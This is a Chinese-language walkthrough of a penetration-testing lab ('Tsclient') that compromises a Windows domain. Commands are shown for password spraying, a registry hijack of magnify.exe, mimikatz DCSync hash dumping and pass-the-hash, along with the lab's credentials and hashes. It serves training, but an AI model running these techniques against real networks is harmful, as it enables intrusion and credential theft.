春秋云镜Tsclient

外网打点

fscan漏扫一下

image-20251216231654859

MDUT数据库连接工具连接一下,没权限,上传一个甜土豆提权

image-20251217102350753

内网打点

提示用户会话,先上线cs

shell query user || qwinsta

查看当前在线用户

image-20251216233252828

尝试进程注入,成功获取,net use查看共享

image-20251216233823396

下面有个凭证

image-20251216233901612

开始收集内网信息,上传fscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:88 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.46:135 open
172.22.8.31:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open

[*] alive ports len is: 16
start vulscan

[*] NetInfo
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:83f:175d:d89d:9280

[*] NetInfo
[*]172.22.8.15
[->]DC01
[->]172.22.8.15

[*] NetInfo
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31

[*] NetInfo
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46

[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01
[*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
1
2
3
4
1. 172.22.8.15 域控
2. 172.22.8.31 域内机器
3. 172.22.8.18 已拿下
4. 172.22.8.46 域内机器

同时搭建好隧道开始打内网,拿刚刚的账号密码去进行挨个尝试,利用kali上面的工具

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/home/kali]
└─# proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
SMB 172.22.8.18 445 WIN-WEB [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-WEB) (domain:WIN-WEB) (signing:False) (SMBv1:True)
SMB 172.22.8.15 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB 172.22.8.18 445 WIN-WEB [-] WIN-WEB\Aldrich:Ald@rLMWuy7Z!# STATUS_LOGON_FAILURE
SMB 172.22.8.46 445 WIN2016 [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN2016) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.8.31 445 WIN19-CLIENT [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN19-CLIENT) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.8.15 445 DC01 [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED
SMB 172.22.8.46 445 WIN2016 [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED
SMB 172.22.8.31 445 WIN19-CLIENT [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED

有些密码过期了,没关系直接改密码即可

1
proxychains4 impacket-changepasswd xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Admin@666'

但是只有172.22.8.46这个可以登录

image-20251217100612264

前面提示了镜像劫持,看看注册表权限

1
Get-Acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

image-20251217100829220

登录进来的用户都可修改,我们利用放大镜提权

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

type "C:\Users\Administrator\flag\flag02.txt"拿到第二个flag

image-20251217101034462

然后我们做横向,先收集这台机器在域中的关系,利用bloodhound这个工具

image-20251217101415030

可以看到这台机器也是一台域控机器,因此我们上传猕猴桃直接抓取hash

1
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
1
2
3
4
5
6
7
8
9
10
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
502 krbtgt 3ffd5b58b4a6328659a606c3ea6f9b63 514
1000 DC01$ ca4725b5186b3a6699d56662b7a9b7c2 532480
500 Administrator 2c9d81bdcf3ec8b1def10328a7cc2f08 512
1103 WIN2016$ a1fbbb8b692fc8bc39c97e6eee719a23 16781312
1104 WIN19-CLIENT$ c043da1da4cd586619bc02ff8940d654 16781312
1105 Aldrich c7c654da31ce51cbeecfef99e637be15 512

之后我kali的crackmapexec打·哈希传递

1
proxychains4 crackmapexec smb 172.22.8.15 -u administrator -H 2c9d81bdcf3ec8b1def10328a7cc2f08 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

域控,拿到第三个flag